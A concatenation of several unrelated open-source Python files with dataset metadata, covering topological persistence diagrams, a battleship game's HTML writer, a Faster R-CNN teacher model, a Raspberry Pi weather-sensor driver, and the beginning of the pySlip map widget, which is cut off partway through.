] | null | null | null | dmt/phat_wrap.py | arksch/fuzzy-eureka | b3511abcef5cdc6cd4d28253d9e69f5ad1a862ec | [
"MIT"
] | null | null | null | dmt/phat_wrap.py | arksch/fuzzy-eureka | b3511abcef5cdc6cd4d28253d9e69f5ad1a862ec | [
"MIT"
] | null | null | null | """ Wrapping PHAT """
import numpy as np
import phat
def persistence_diagram(boundary_matrix_csc, dimensions, filtration):
    """Compute the persistence diagrams of a filtered complex with PHAT.

    :param boundary_matrix_csc: sparse CSC boundary matrix of the complex
    :param dimensions: per-cell dimensions
    :param filtration: per-cell filtration values
    :returns: dict mapping each dimension to its birth/death pairs
    """
    # Order cells by filtration value, breaking ties by dimension
    # (np.lexsort gives the *last* key the highest sort priority).
    order = np.lexsort((dimensions, filtration))
    matrix = boundary_matrix_csc[order, :][:, order]
    dims = dimensions[order]
    filt = filtration[order]
    n_cols = matrix.shape[1]
    assert len(dims) == n_cols
    columns = [matrix.getcol(j).indices.tolist() for j in range(n_cols)]
    # Many representations (vector_vector, full_pivot_column,
    # bit_tree_pivot_column) of PHAT seem to work incorrectly;
    # vector_heap is ok.
    boundary = phat.boundary_matrix(representation=phat.representations.vector_heap,
                                    columns=list(zip(dims, columns)))
    pairs = boundary.compute_persistence_pairs(reduction=phat.reductions.twist_reduction)
    return pairs_to_diagram(pairs, dims, filt)
def pairs_to_diagram(pairs, dimensions, filtration):
    """Convert PHAT (birth, death) index pairs into per-dimension diagrams.

    :param pairs: iterable of (birth_index, death_index) cell-index pairs
    :param dimensions: per-cell dimensions (numpy int array)
    :param filtration: per-cell filtration values
    :returns: dict mapping dimension -> (k, 2) array of filtration values
    """
    index_pairs = np.array(pairs, dtype=int).reshape(-1, 2)  # keep 2 cols even when empty
    index_pairs = add_infinite_pairs(index_pairs, size=len(filtration))
    diagrams = {}
    for dim in range(max(dimensions) + 1):
        dim_pairs = pairs_in_dimension(index_pairs, dimensions, dim)
        diagrams[dim] = pairs_to_filtr_diag(dim_pairs, filtration)
    return diagrams
def add_infinite_pairs(pairs, size):
    """Append a (birth, -1) row for every cell index never killed by a pair."""
    unpaired = np.setdiff1d(np.arange(size, dtype=int), pairs)
    sentinel_deaths = np.full(len(unpaired), -1)
    return np.concatenate([pairs, np.column_stack([unpaired, sentinel_deaths])])
def pairs_in_dimension(pairs, dimensions, dim):
    """Select the rows of ``pairs`` whose birth cell has dimension ``dim``."""
    cell_ixs = np.where(dimensions == dim)[0]
    return pairs[np.isin(pairs[:, 0], cell_ixs)]
def pairs_to_filtr_diag(pairs, filtration):
    """Map index pairs to filtration values; the -1 death sentinel maps to +inf."""
    filtration_ext = np.append(filtration, np.inf)
    return filtration_ext[pairs.astype(int)]
| 39.714286 | 92 | 0.722572 |
87f7cc70def08e11f6405a30b6d37e5706600bcf | 1,769 | py | Python | napisi_tabelo_naprej.py | klarakresnik/Potapljanje-ladjic | 0ffec3a3ba7f20cfa8851d7b30c7d85eb335ab98 | [
"MIT"
] | null | null | null | napisi_tabelo_naprej.py | klarakresnik/Potapljanje-ladjic | 0ffec3a3ba7f20cfa8851d7b30c7d85eb335ab98 | [
"MIT"
] | null | null | null | napisi_tabelo_naprej.py | klarakresnik/Potapljanje-ladjic | 0ffec3a3ba7f20cfa8851d7b30c7d85eb335ab98 | [
"MIT"
] | null | null | null | import model
def napisi_tabelo_naprej(datoteka, morje, velikost, st):
vsebina = ''
with open(datoteka, 'w', encoding='utf-8') as dat:
dat.write("%rebase('base_za_sestavljanje_ladjic" + str(velikost) + ".tpl')\n")
dat.write('Izberi si nadaljne kvadratke tvoje ladjice.\n')
if st == 0:
dat.write('<form action="/oblikovanje_mape/ladja/" method="post">\n')
if st == 1:
dat.write('<form action="/oblikovanje_mape/ladja_prvi/" method="post">\n')
if st == 2:
dat.write('<form action="/oblikovanje_mape/ladja_drugi/" method="post">\n')
dat.write('<div style="margin:20px">\n<table>\n')
for x in range(velikost ** 2):
stanje = morje.mapa[x]
ime = str(x)
if x in morje.predlagaj_okolico_ladje(morje.trenutna_ladja):
vsebina = '<button class="velikost_gumba" style="background-color:#3394b5;" name="ladja" type="submit" value="' + ime + '"></button>'
else:
if stanje == model.MORJE:
vsebina = '<button class="velikost_gumba" style="background-color:##4bafd1;" type="button" disabled></button>'
if stanje == model.LADJA:
vsebina = '<button class="velikost_gumba" style="background-color:#e1e3e1" type="button" disabled><i class="material-icons" style="color:black;">directions_boat</i></button>'
if x % velikost == 0:
dat.write('<tr>\n')
dat.write('<td>')
dat.write(vsebina)
dat.write('</td>\n')
if (x + 1) % velikost == 0:
dat.write('</tr>\n')
dat.write('</div>\n</table>\n</div>\n</form>\n') | 55.28125 | 214 | 0.542114 |
f97869c1c0a6a109415f72eb29da80ccd440da50 | 5,404 | py | Python | lib/model/faster_rcnn/faster_rcnn_teacher.py | heekhero/MTOR | e0dbc22bb7f4bc864ed7a7d43ffeb22671d8fd40 | [
"MIT"
] | 3 | 2020-05-01T08:46:55.000Z | 2022-03-10T11:07:12.000Z | lib/model/faster_rcnn/faster_rcnn_teacher.py | heekhero/MTOR | e0dbc22bb7f4bc864ed7a7d43ffeb22671d8fd40 | [
"MIT"
] | null | null | null | lib/model/faster_rcnn/faster_rcnn_teacher.py | heekhero/MTOR | e0dbc22bb7f4bc864ed7a7d43ffeb22671d8fd40 | [
"MIT"
] | null | null | null | import random
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
import torchvision.models as models
from torch.autograd import Variable
import numpy as np
from model.utils.config import cfg
from model.rpn.rpn import _RPN
from torchvision.ops import RoIPool
from torchvision.ops import RoIAlign
from model.rpn.proposal_target_layer_cascade import _ProposalTargetLayer
import time
import pdb
import torch.nn.init as init
from model.utils.net_utils import _smooth_l1_loss, _crop_pool_layer, _affine_grid_gen, _affine_theta
from torchvision.ops import nms
class _fasterRCNN(nn.Module):
""" faster RCNN """
def __init__(self, classes, class_agnostic):
super(_fasterRCNN, self).__init__()
self.classes = classes
self.n_classes = len(classes)
self.class_agnostic = class_agnostic
# loss
self.RCNN_loss_cls = 0
self.RCNN_loss_bbox = 0
# define rpn
self.RCNN_rpn = _RPN(self.dout_base_model)
self.RCNN_proposal_target = _ProposalTargetLayer(self.n_classes)
self.RCNN_roi_align = RoIAlign(output_size=(cfg.POOLING_SIZE, cfg.POOLING_SIZE), spatial_scale=1.0 / 16.0,
sampling_ratio=2)
self.RCNN_roi_pool = RoIPool((cfg.POOLING_SIZE, cfg.POOLING_SIZE), 1.0 / 16.0)
self.grid_size = cfg.POOLING_SIZE * 2 if cfg.CROP_RESIZE_WITH_MAX_POOL else cfg.POOLING_SIZE
def forward(self, im_data, im_info, gt_boxes, num_boxes):
batch_size = im_data.size(0)
base_feat = self.RCNN_base(im_data)
rois, rpn_loss_cls, rpn_loss_bbox = self.RCNN_rpn(base_feat, im_info, gt_boxes, num_boxes)
rois = Variable(rois)
if cfg.POOLING_MODE == 'crop':
grid_xy = _affine_grid_gen(rois.view(-1, 5), base_feat.size()[2:], self.grid_size)
grid_yx = torch.stack([grid_xy.data[:,:,:,1], grid_xy.data[:,:,:,0]], 3).contiguous()
pooled_feat = self.RCNN_roi_crop(base_feat, Variable(grid_yx).detach())
if cfg.CROP_RESIZE_WITH_MAX_POOL:
pooled_feat = F.max_pool2d(pooled_feat, 2, 2)
elif cfg.POOLING_MODE == 'align':
pooled_feat = self.RCNN_roi_align(base_feat, rois.view(-1, 5))
elif cfg.POOLING_MODE == 'pool':
pooled_feat = self.RCNN_roi_pool(base_feat, rois.view(-1,5))
pooled_feat_post = self._head_to_tail(pooled_feat)
bbox_pred = self.RCNN_bbox_pred(pooled_feat_post)
cls_score = self.RCNN_cls_score(pooled_feat_post)
cls_prob = F.softmax(cls_score, 1)
cls_prob = cls_prob.view(batch_size, rois.size(1), -1)
bbox_pred = bbox_pred.view(batch_size, rois.size(1), -1)
post_inds = self.rois_filter(cls_prob, cfg.TRAIN.TEACHER_ROI_THRESHOLD)
if len(post_inds) > 100:
# print(len(post_inds))
post_inds = post_inds[torch.randperm(len(post_inds))[:100]]
post_rois = rois[:, post_inds, :]
post_cls_prob = cls_prob[:, post_inds, :]
pooled_feat_post = pooled_feat_post[post_inds, :]
# max_fg_prob, max_fg_inds = torch.max(post_cls_prob[0], dim=1)
#
# res_rois = None
# res_cls_prob = None
# res_feat = None
# for cls_ind in range(1, post_cls_prob.size(2)):
# each_cls_inds = torch.nonzero((max_fg_inds==cls_ind).view(-1)).view(-1)
# each_max_fg_prob = max_fg_prob[each_cls_inds]
# keep = nms(post_rois[0, each_cls_inds, 1:], each_max_fg_prob, 0.7)
# if res_rois is None:
# res_rois = post_rois[:, keep, :]
# res_cls_prob = post_cls_prob[:, keep, :]
# res_feat = pooled_feat_post[keep, :]
# else:
# res_rois = torch.cat([res_rois, post_rois[:, keep, :]], dim=1)
# res_cls_prob = torch.cat([res_cls_prob, post_cls_prob[:, keep, :]], dim=1)
# res_fea = torch.cat([res_feat, pooled_feat_post[keep, :]], dim=0)
if self.training:
return post_rois, pooled_feat_post, post_cls_prob
else:
return rois, cls_prob, bbox_pred
def _init_weights(self):
def normal_init(m, mean, stddev, truncated=False):
"""
weight initalizer: truncated normal and random normal.
"""
# x is a parameter
if truncated:
m.weight.data.normal_().fmod_(2).mul_(stddev).add_(mean) # not a perfect approximation
else:
m.weight.data.normal_(mean, stddev)
m.bias.data.zero_()
normal_init(self.RCNN_rpn.RPN_Conv, 0, 0.01, cfg.TRAIN.TRUNCATED)
normal_init(self.RCNN_rpn.RPN_cls_score, 0, 0.01, cfg.TRAIN.TRUNCATED)
normal_init(self.RCNN_rpn.RPN_bbox_pred, 0, 0.01, cfg.TRAIN.TRUNCATED)
normal_init(self.RCNN_cls_score, 0, 0.01, cfg.TRAIN.TRUNCATED)
normal_init(self.RCNN_bbox_pred, 0, 0.001, cfg.TRAIN.TRUNCATED)
def create_architecture(self):
self._init_modules()
self._init_weights()
def rois_filter(self, cls_prob, threshold):
    """Return indices of foreground ROIs whose best class score beats threshold.

    cls_prob   (1, num_rois, num_classes) class probabilities (class 0 = background)
    threshold  minimum probability for the winning foreground class

    Returns a 1-D LongTensor of ROI indices.
    """
    probs = cls_prob.squeeze(0)
    best_prob, best_cls = probs.max(dim=1)
    # foreground = argmax class is not the background class (index 0)
    fg_inds = torch.nonzero((best_cls != 0).view(-1)).view(-1)
    confident = (best_prob[fg_inds] > threshold).view(-1)
    keep = torch.nonzero(confident).view(-1)
    return fg_inds[keep]
| 41.569231 | 114 | 0.642857 |
2b7908bc69d412c34b9ffe0e592a1e1221b2d9d4 | 63 | py | Python | script_generators/process_test.py | westernmarslab/tanager-feeder | 59bc4d5deca474e2c915ea49aaba791f247de41f | [
"MIT"
] | null | null | null | script_generators/process_test.py | westernmarslab/tanager-feeder | 59bc4d5deca474e2c915ea49aaba791f247de41f | [
"MIT"
] | null | null | null | script_generators/process_test.py | westernmarslab/tanager-feeder | 59bc4d5deca474e2c915ea49aaba791f247de41f | [
"MIT"
] | 1 | 2021-04-23T00:03:46.000Z | 2021-04-23T00:03:46.000Z | for i in range(30):
print("process(")
print("sleep(5)") | 21 | 21 | 0.571429 |
ecd8ff242f98596fde6c75bab2dcebf7bbe750dd | 10,517 | py | Python | SDL_Pi_WeatherRack/SDL_Pi_WeatherRack.py | zerosquadron/grove-weather-pi | 05cab7836f831546cbb2a7cd2a260e2fe15de62b | [
"MIT"
] | 1 | 2019-03-19T06:59:45.000Z | 2019-03-19T06:59:45.000Z | SDL_Pi_WeatherRack/SDL_Pi_WeatherRack.py | zerosquadron/grove-weather-pi | 05cab7836f831546cbb2a7cd2a260e2fe15de62b | [
"MIT"
] | null | null | null | SDL_Pi_WeatherRack/SDL_Pi_WeatherRack.py | zerosquadron/grove-weather-pi | 05cab7836f831546cbb2a7cd2a260e2fe15de62b | [
"MIT"
] | null | null | null | #
#
#
# SDL_Pi_WeatherRack.py - Raspberry Pi Python Library for SwitchDoc Labs WeatherRack.
#
# SparkFun Weather Station Meters
# Argent Data Systems
# Created by SwitchDoc Labs February 13, 2015
# Released into the public domain.
# Version 1.3 - remove 300ms Bounce
# Version 2.0 - Update for WeatherPiArduino V2
# Version 3.0 - Removed Double Interrupts
#
# imports
try:
# Check for user imports
try:
import conflocal as config
except ImportError:
import config
except:
import NoWPAConfig as config
import sys
import time as time_
sys.path.append('./SDL_Adafruit_ADS1x15')
from SDL_Adafruit_ADS1x15 import ADS1x15
import RPi.GPIO as GPIO
GPIO.setwarnings(False)
from datetime import *
# constants

# A/D converter selection for reading the wind vane.  The 'internal' path
# is a stub in this module (it always yields 0.0 volts).
SDL_MODE_INTERNAL_AD = 0
SDL_MODE_I2C_ADS1015 = 1

# sample mode means return immediately. THe wind speed is averaged at
# sampleTime or when you ask, whichever is longer
SDL_MODE_SAMPLE = 0
# Delay mode means to wait for sampleTime and the average after that time.
SDL_MODE_DELAY = 1

# Number of interrupts per rain bucket tip and anemometer click
SDL_INTERRUPT_CLICKS = 1
SDL_RAIN_BUCKET_CLICKS = 2

# speed scale factor per (click/second); halved if each click fires
# multiple interrupts
WIND_FACTOR = 2.400 / SDL_INTERRUPT_CLICKS
# Helper Functions
def fuzzyCompare(compareValue, value):
    """Return True when *value* lies strictly within +/-5% of *compareValue*."""
    tolerance = 0.05
    lower = compareValue * (1.0 - tolerance)
    upper = compareValue * (1.0 + tolerance)
    return lower < value < upper
def voltageToDegrees(value, defaultWindDirection):
    """Translate a wind-vane A/D voltage into a compass bearing in degrees.

    value                 measured vane voltage (5V supply assumed)
    defaultWindDirection  returned when no table entry matches
                          (callers pass the previous direction)

    Note: The original documentation for the wind vane says 16 positions.
    Typically only recieve 8 positions. And 315 degrees was wrong.
    Entries are tested in the original fixed order because some +/-5%
    windows overlap (e.g. 3.84 and 4.04).
    """
    # For 5V, use 1.0. For 3.3V use 0.66
    ADJUST3OR5 = 1.0
    VARYVALUE = 0.05    # each nominal voltage matches within a strict +/-5% window

    # (nominal voltage, bearing in degrees) pairs, in the original test order
    table = ((3.84, 0.0), (1.98, 22.5), (2.25, 45), (0.41, 67.5),
             (0.45, 90.0), (0.32, 112.5), (0.90, 135.0), (0.62, 157.5),
             (1.40, 180), (1.19, 202.5), (3.08, 225), (2.93, 247.5),
             (4.62, 270.0), (4.04, 292.5), (4.34, 315.0), (3.43, 337.5))

    for nominal, degrees in table:
        ref = nominal * ADJUST3OR5
        # strict bounds, exactly as fuzzyCompare() computes them
        if ref * (1.0 - VARYVALUE) < value < ref * (1.0 + VARYVALUE):
            return degrees

    return defaultWindDirection  # return previous value if not found
# return current microseconds
def micros():
    """Return the current wall-clock time in whole microseconds."""
    # time.time() yields seconds as a float; scale then round to an int
    return int(round(time_.time() * 1000000))
class SDL_Pi_WeatherRack:
    """Driver for the SwitchDoc Labs WeatherRack sensors on a Raspberry Pi.

    Handles an anemometer and a rain bucket via GPIO edge interrupts, and a
    wind vane via an ADS1015/ADS1115 I2C A/D converter.  Counters are kept
    as CLASS attributes because the GPIO interrupt callbacks update shared
    state.  Speeds are click rates scaled by WIND_FACTOR (units not
    documented here; presumably km/h - confirm against the sensor docs).
    """

    # NOTE: executed once at class-definition time, not per instance
    GPIO.setmode(GPIO.BCM)
    GPIO.setwarnings(False)

    # instance variables (actually class-level state shared by the callbacks)
    _currentWindCount = 0
    _currentRainCount = 0
    _shortestWindTime = 0

    _pinAnem = 0
    _pinRain = 0
    _intAnem = 0
    _intRain = 0
    _ADChannel = 0
    _ADMode = 0

    _currentRainCount = 0          # duplicate re-assignment of the value above
    _currentWindCount = 0          # duplicate re-assignment of the value above
    _currentWindSpeed = 0.0
    _currentWindDirection = 0.0

    _lastWindTime = 0              # micros() timestamp of last anemometer edge
    _shortestWindTime = 0          # shortest gap between edges -> wind gust

    _sampleTime = 5.0              # seconds per wind-speed sample window
    _selectedMode = SDL_MODE_SAMPLE
    _startSampleTime = 0

    _currentRainMin = 0            # shortest gap between rain-bucket edges
    _lastRainTime = 0              # micros() timestamp of last rain edge

    _ads1015 = 0

    def __init__(self, pinAnem, pinRain, intAnem, intRain, ADMode):
        """Configure GPIO interrupts and probe for the I2C A/D converter.

        pinAnem / pinRain   BCM pin numbers for anemometer / rain bucket
        intAnem / intRain   interrupt numbers (accepted but unused here)
        ADMode              SDL_MODE_INTERNAL_AD or SDL_MODE_I2C_ADS1015
        """
        GPIO.setup(pinAnem, GPIO.IN)
        GPIO.setup(pinRain, GPIO.IN)

        # when a falling edge is detected on port pinAnem, regardless of whatever
        # else is happening in the program, the function callback will be run
        #GPIO.add_event_detect(pinAnem, GPIO.RISING, callback=self.serviceInterruptAnem)
        #GPIO.add_event_detect(pinRain, GPIO.RISING, callback=self.serviceInterruptRain)
        GPIO.add_event_detect(pinAnem, GPIO.RISING, callback=self.serviceInterruptAnem, bouncetime=40)
        GPIO.add_event_detect(pinRain, GPIO.RISING, callback=self.serviceInterruptRain, bouncetime=40)

        ADS1015 = 0x00  # 12-bit ADC
        ADS1115 = 0x01  # 16-bit ADC

        # Select the gain
        self.gain = 6144  # +/- 6.144V
        #self.gain = 4096  # +/- 4.096V

        # Select the sample rate
        self.sps = 250  # 250 samples per second

        # Initialise the ADC using the default mode (use default I2C address)
        # Set this to ADS1015 or ADS1115 depending on the ADC you are using!
        self.ads1015 = ADS1x15(ic=ADS1015, address=0x48)

        # determine if device present, and whether it is a 12- or 16-bit part
        # (a raw ADS1015 read has the low 4 bits clear)
        try:
            value = self.ads1015.readRaw(1, self.gain, self.sps)  # AIN1 wired to wind vane on WeatherPiArduino
            time_.sleep(1.0)
            value = self.ads1015.readRaw(1, self.gain, self.sps)  # AIN1 wired to wind vane on WeatherPiArduino

            # now figure out if it is an ADS1015 or ADS1115
            if ((0x0F & value) == 0):
                config.ADS1015_Present = True
                config.ADS1115_Present = False

                # check again (1 out 16 chance of zero)
                value = self.ads1015.readRaw(0, self.gain, self.sps)  # AIN1 wired to wind vane on WeatherPiArduino
                if ((0x0F & value) == 0):
                    config.ADS1015_Present = True
                    config.ADS1115_Present = False
                else:
                    config.ADS1015_Present = False
                    config.ADS1115_Present = True
                    self.ads1015 = ADS1x15(ic=ADS1115, address=0x48)
            else:
                config.ADS1015_Present = False
                config.ADS1115_Present = True
                self.ads1015 = ADS1x15(ic=ADS1115, address=0x48)

        except TypeError as e:
            print "Type Error"
            config.ADS1015_Present = False
            config.ADS1115_Present = False

        SDL_Pi_WeatherRack._ADMode = ADMode

    # Wind Direction Routines

    def current_wind_direction(self):
        """Return the current wind-vane bearing in degrees.

        Falls back to the previously stored direction when the vane
        voltage matches no table entry (see voltageToDegrees()).
        """
        if (SDL_Pi_WeatherRack._ADMode == SDL_MODE_I2C_ADS1015):
            value = self.ads1015.readADCSingleEnded(1, self.gain, self.sps)  # AIN1 wired to wind vane on WeatherPiArduino
            voltageValue = value/1000  # reading is in millivolts
        else:
            # user internal A/D converter (stub: always 0.0)
            voltageValue = 0.0
        direction = voltageToDegrees(voltageValue, SDL_Pi_WeatherRack._currentWindDirection)
        return direction;

    def current_wind_direction_voltage(self):
        """Return the raw wind-vane voltage in volts."""
        if (SDL_Pi_WeatherRack._ADMode == SDL_MODE_I2C_ADS1015):
            value = self.ads1015.readADCSingleEnded(1, self.gain, self.sps)  # AIN1 wired to wind vane on WeatherPiArduino
            voltageValue = value/1000  # reading is in millivolts
        else:
            # user internal A/D converter (stub: always 0.0)
            voltageValue = 0.0
        return voltageValue

    # Utility methods

    def reset_rain_total(self):
        """Zero the accumulated rain-bucket click count."""
        SDL_Pi_WeatherRack._currentRainCount = 0;

    def accessInternalCurrentWindDirection(self):
        """Return the last internally stored wind direction (degrees)."""
        return SDL_Pi_WeatherRack._currentWindDirection;

    def reset_wind_gust(self):
        """Forget the shortest inter-click time, restarting gust tracking."""
        SDL_Pi_WeatherRack._shortestWindTime = 0xffffffff;

    def startWindSample(self, sampleTime):
        """Begin a wind-speed sampling window of sampleTime seconds."""
        SDL_Pi_WeatherRack._startSampleTime = micros();
        SDL_Pi_WeatherRack._sampleTime = sampleTime;

    # get current wind
    def get_current_wind_speed_when_sampling(self):
        """Return the wind speed, recomputing it when the window expires.

        Clicks accumulate in the interrupt handler; once at least
        _sampleTime seconds have passed, the click rate is converted to a
        speed via WIND_FACTOR and the window is restarted.
        """
        compareValue = SDL_Pi_WeatherRack._sampleTime*1000000;
        if (micros() - SDL_Pi_WeatherRack._startSampleTime >= compareValue):
            # sample time exceeded, calculate currentWindSpeed
            timeSpan = (micros() - SDL_Pi_WeatherRack._startSampleTime);
            SDL_Pi_WeatherRack._currentWindSpeed = (float(SDL_Pi_WeatherRack._currentWindCount)/float(timeSpan)) * WIND_FACTOR*1000000.0
            #print "SDL_CWS = %f, SDL_Pi_WeatherRack._shortestWindTime = %i, CWCount=%i TPS=%f" % (SDL_Pi_WeatherRack._currentWindSpeed,SDL_Pi_WeatherRack._shortestWindTime, SDL_Pi_WeatherRack._currentWindCount, float(SDL_Pi_WeatherRack._currentWindCount)/float(SDL_Pi_WeatherRack._sampleTime))
            SDL_Pi_WeatherRack._currentWindCount = 0
            SDL_Pi_WeatherRack._startSampleTime = micros()
        #print "SDL_Pi_WeatherRack._currentWindSpeed=", SDL_Pi_WeatherRack._currentWindSpeed
        return SDL_Pi_WeatherRack._currentWindSpeed

    def setWindMode(self, selectedMode, sampleTime):  # time in seconds
        """Select SDL_MODE_SAMPLE or SDL_MODE_DELAY and the window length."""
        SDL_Pi_WeatherRack._sampleTime = sampleTime;
        SDL_Pi_WeatherRack._selectedMode = selectedMode;
        if (SDL_Pi_WeatherRack._selectedMode == SDL_MODE_SAMPLE):
            self.startWindSample(SDL_Pi_WeatherRack._sampleTime);

    #def get current values
    def get_current_rain_total(self):
        """Return rain accumulated since the last call, then reset the count.

        0.2794 is presumably the rain depth (mm) per bucket tip - confirm
        against the rain gauge datasheet.
        """
        rain_amount = 0.2794 * float(SDL_Pi_WeatherRack._currentRainCount)/SDL_RAIN_BUCKET_CLICKS
        SDL_Pi_WeatherRack._currentRainCount = 0;
        return rain_amount;

    def current_wind_speed(self):  # in milliseconds
        """Return the current wind speed according to the selected mode."""
        if (SDL_Pi_WeatherRack._selectedMode == SDL_MODE_SAMPLE):
            SDL_Pi_WeatherRack._currentWindSpeed = self.get_current_wind_speed_when_sampling();
        else:
            # km/h * 1000 msec
            # NOTE(review): delay() is not defined in this module, so this
            # branch would raise NameError - presumably time_.sleep() with a
            # seconds argument was intended; confirm before relying on
            # SDL_MODE_DELAY.
            SDL_Pi_WeatherRack._currentWindCount = 0;
            delay(SDL_Pi_WeatherRack._sampleTime*1000);
            SDL_Pi_WeatherRack._currentWindSpeed = (float(SDL_Pi_WeatherRack._currentWindCount)/float(SDL_Pi_WeatherRack._sampleTime)) * WIND_FACTOR;
        return SDL_Pi_WeatherRack._currentWindSpeed;

    def get_wind_gust(self):
        """Return the gust speed from the shortest click gap, then reset it."""
        latestTime = SDL_Pi_WeatherRack._shortestWindTime;
        SDL_Pi_WeatherRack._shortestWindTime = 0xffffffff;
        time = latestTime/1000000.0;  # convert microseconds to seconds
        if (time == 0):
            return 0
        else:
            return (1.0/float(time))*WIND_FACTOR;

    # Interrupt Routines

    def serviceInterruptAnem(self, channel):
        """GPIO callback: count one anemometer click, software-debounced."""
        #print "Anem Interrupt Service Routine"
        currentTime = (micros()-SDL_Pi_WeatherRack._lastWindTime);
        SDL_Pi_WeatherRack._lastWindTime = micros();
        if(currentTime > 4000):  # debounce: ignore edges closer than 4000 us
            SDL_Pi_WeatherRack._currentWindCount = SDL_Pi_WeatherRack._currentWindCount+1
            if(currentTime < SDL_Pi_WeatherRack._shortestWindTime):
                SDL_Pi_WeatherRack._shortestWindTime = currentTime;
        else:
            print "currentTime=%i"%currentTime
            print "DEBOUNCE-count=%i" % SDL_Pi_WeatherRack._currentWindCount

    def serviceInterruptRain(self, channel):
        """GPIO callback: count one rain-bucket tip, software-debounced."""
        print "Rain Interrupt Service Routine"
        currentTime = (micros()-SDL_Pi_WeatherRack._lastRainTime);
        SDL_Pi_WeatherRack._lastRainTime = micros();
        if(currentTime > 500):  # debounce: ignore edges closer than 500 us
            SDL_Pi_WeatherRack._currentRainCount = SDL_Pi_WeatherRack._currentRainCount+1
            if(currentTime < SDL_Pi_WeatherRack._currentRainMin):
                SDL_Pi_WeatherRack._currentRainMin = currentTime;

    def returnInterruptClicks(self):
        """Return the configured number of interrupts per physical click."""
        return SDL_INTERRUPT_CLICKS
| 26.829082 | 286 | 0.721689 |
9056942a9a4d1e2c190f46b76d564de2f7b0a336 | 101,119 | py | Python | rstbx/slip_viewer/pyslip.py | rimmartin/cctbx_project | 644090f9432d9afc22cfb542fc3ab78ca8e15e5d | [
"BSD-3-Clause-LBNL"
] | null | null | null | rstbx/slip_viewer/pyslip.py | rimmartin/cctbx_project | 644090f9432d9afc22cfb542fc3ab78ca8e15e5d | [
"BSD-3-Clause-LBNL"
] | null | null | null | rstbx/slip_viewer/pyslip.py | rimmartin/cctbx_project | 644090f9432d9afc22cfb542fc3ab78ca8e15e5d | [
"BSD-3-Clause-LBNL"
] | null | null | null | # -*- mode: python; coding: utf-8; indent-tabs-mode: nil; python-indent: 2 -*-
#
# $Id$
"""
A 'slippy map' widget for wxPython.
So why is this widget called 'pySlip'?
Well, in the OpenStreetMap world[1], a 'slippy map' is a browser map view
served by a tile server that can be panned and zoomed in the same way as
popularised by Google maps. Such a map feels 'slippery', I guess.
Rather than 'slippy' I went for the slightly more formal 'pySlip' since the
thing is written in Python and therefore must have the obligatory 'py' prefix.
Even though this was originally written for a geographical application, the
underlying system only assumes a cartesian 2D coordinate system. So pySlip
could be used to present a game map, 2D CAD view, or whatever. The major
difficulty for most uses is to generate the map tiles.
[1] http://wiki.openstreetmap.org/index.php/Slippy_Map
"""
from __future__ import division
from six.moves import range
# Copyright (c) 2010, Ross Wilson (rzzzwilson@gmail.com). All rights reserved.
#
# Redistribution and use in source and binary forms, with or
# without modification, are permitted provided that the following conditions
# are met:
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import os
import sys
import glob
from six.moves import cPickle as pickle
import wx
from scitbx.matrix import col
import math
# if we don't have log.py, don't crash
try:
import log
log = log.Log('pyslip.log', log.Log.DEBUG)
except Exception:
def log(*args, **kwargs):
pass
__version__ = '2.2'
__all__ = ['PySlip']
WX3 = wx.VERSION[0] == 3
# type of SELECT events (attached to the event object for the handler)
EventPointSelect = 0        # single point selected (left click)
EventBoxSelect = 1          # box selection (left drag)
EventRightPointSelect = 2   # single point selected (right click)
EventRightBoxSelect = 3     # box selection (right drag)
######
# utility routines.
######
def point_inside_polygon(x, y, poly):
    """Decide if point (x, y) is properly inside polygon *poly*.

    x     x coord of point in question
    y     y coord of point in question
    poly  polygon in form [(x1, y1), (x2, y2), ...]

    Returns True if point is properly inside polygon.
    May return True or False if point on edge of polygon.

    Ray-casting: walk every edge of the closed polygon and toggle the
    'inside' flag each time a horizontal ray from the point crosses an edge.
    """
    verts = list(poly)
    # pairing verts with this rotation yields every edge, including the
    # closing edge back to the first vertex
    ring = verts[1:] + [verts[0]]

    inside = False
    for (ax, ay), (bx, by) in zip(verts, ring):
        # does this edge straddle the horizontal line through y?
        if min(ay, by) < y <= max(ay, by) and x <= max(ax, bx):
            # ay != by is guaranteed here: a horizontal edge can never
            # satisfy min(ay, by) < y <= max(ay, by)
            x_cross = (y - ay) * (bx - ax) / (by - ay) + ax
            if ax == bx or x <= x_cross:
                inside = not inside
    return inside
######
# Base class for the widget canvas - buffered and flicker-free.
######
class _BufferedCanvas(wx.Panel):
    """Implements a buffered, flicker-free canvas widget.

    All drawing goes into an off-screen wx bitmap (self.buffer); OnPaint
    only blits that buffer, so the screen never shows partial renders.

    This class is based on:
        http://wiki.wxpython.org/index.cgi/BufferedCanvas
    """

    # The backing buffer (class-level placeholder; replaced per-instance
    # with a real bitmap in OnSize())
    buffer = None

    def __init__(self, parent, id=wx.ID_ANY, pos=wx.DefaultPosition,
                 size=wx.DefaultSize, style=wx.NO_FULL_REPAINT_ON_RESIZE):
        """Initialize the canvas.

        parent  reference to 'parent' widget
        id      the unique widget ID
        pos     canvas position
        size    canvas size
        style   wxPython style
        """
        wx.Panel.__init__(self, parent, id, pos, size, style)

        # Bind events
        self.Bind(wx.EVT_PAINT, self.OnPaint)
        self.Bind(wx.EVT_SIZE, self.OnSize)

        # Disable background erasing (flicker-licious) by swallowing the
        # erase-background event with a do-nothing handler
